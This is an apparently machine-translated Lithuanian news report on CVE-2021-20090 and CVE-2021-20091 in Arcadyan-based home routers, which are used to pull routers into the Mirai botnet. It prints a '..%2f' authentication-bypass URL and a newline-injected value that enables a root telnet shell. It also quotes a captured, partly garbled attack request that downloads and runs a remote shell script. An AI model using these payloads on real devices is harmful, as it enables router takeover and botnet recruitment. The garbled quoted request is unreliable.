Tinkle buvo užfiksuota didžiulė ataka prieš namų maršrutizatorius, kurių programinė įranga naudoja HTTP serverio diegimą iš bendrovės Arcadyan. Norint valdyti įrenginius, naudojamas dviejų pažeidžiamumų derinys, leidžiantis nuotoliniu būdu vykdyti savavališką kodą su root teisėmis. Problema paliečia gana platų ADSL maršrutizatorių iš Arcadyan, ASUS ir Buffalo asortimentą, taip pat įrenginius, tiekiamus su Beeline prekės ženklais (problema patvirtinama Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ir kitų telekomunikacijų operatorių. Pažymima, kad problema Arcadyan programinėje įrangoje egzistuoja daugiau nei 10 metų ir per tą laiką pavyko pereiti į mažiausiai 20 įrenginių modelių iš 17 skirtingų gamintojų.
Pirmasis pažeidžiamumas CVE-2021-20090 leidžia pasiekti bet kurį žiniatinklio sąsajos scenarijų be autentifikavimo. Pažeidžiamumo esmė ta, kad žiniatinklio sąsajoje kai kurie katalogai, per kuriuos siunčiami vaizdai, CSS failai ir JavaScript scenarijai, pasiekiami be autentifikavimo. Tokiu atveju katalogai, kuriems leidžiama prieiga be autentifikavimo, tikrinami naudojant pradinę kaukę. „../“ simbolių nurodymą keliuose, kuriais reikia pereiti į pirminį katalogą, blokuoja programinė įranga, tačiau „..%2f“ derinio naudojimas praleidžiamas. Taigi, siunčiant užklausas, pvz., „http://192.168.1.1/images/..%2findex.htm“, galima atidaryti apsaugotus puslapius.
Antrasis pažeidžiamumas CVE-2021-20091 leidžia autentifikuotam vartotojui atlikti įrenginio sistemos nustatymų pakeitimus siunčiant specialiai suformatuotus parametrus į scenarijų apply_abstract.cgi, kuris netikrina, ar parametruose nėra naujos eilutės simbolio. . Pavyzdžiui, vykdydamas ping operaciją, užpuolikas gali nurodyti reikšmę „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ lauke su tikrinamu IP adresu ir scenariju, kurdamas nustatymų failą /tmp/etc/config/ .glbcfg, į jį įrašys eilutę „AARC_SYS_TelnetdEnable=1“, kuri suaktyvins telnetd serverį, kuris suteikia neribotą komandų apvalkalo prieigą su root teisėmis. Panašiai, nustatydami parametrą AARC_SYS, galite vykdyti bet kokį kodą sistemoje. Pirmasis pažeidžiamumas leidžia paleisti probleminį scenarijų be autentifikavimo, pasiekiant jį kaip „/images/..%2fapply_abstract.cgi“.
Kad galėtų išnaudoti pažeidžiamumą, užpuolikas turi turėti galimybę nusiųsti užklausą į tinklo prievadą, kuriame veikia žiniatinklio sąsaja. Sprendžiant iš atakos plitimo dinamikos, daugelis operatorių palieka prieigą prie savo įrenginių iš išorinio tinklo, kad supaprastintų pagalbos tarnybos problemų diagnostiką. Jei prieiga prie sąsajos ribojama tik vidiniame tinkle, ataka gali būti vykdoma iš išorinio tinklo naudojant „DNS perrišimo“ techniką. Pažeidžiamumas jau aktyviai naudojamas maršrutizatorių prijungimui prie „Mirai“ botneto: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Ryšys: uždaryti naudotojo agentą: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_.212.192.241.7.ipaddress0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Šaltinis: opennet.ru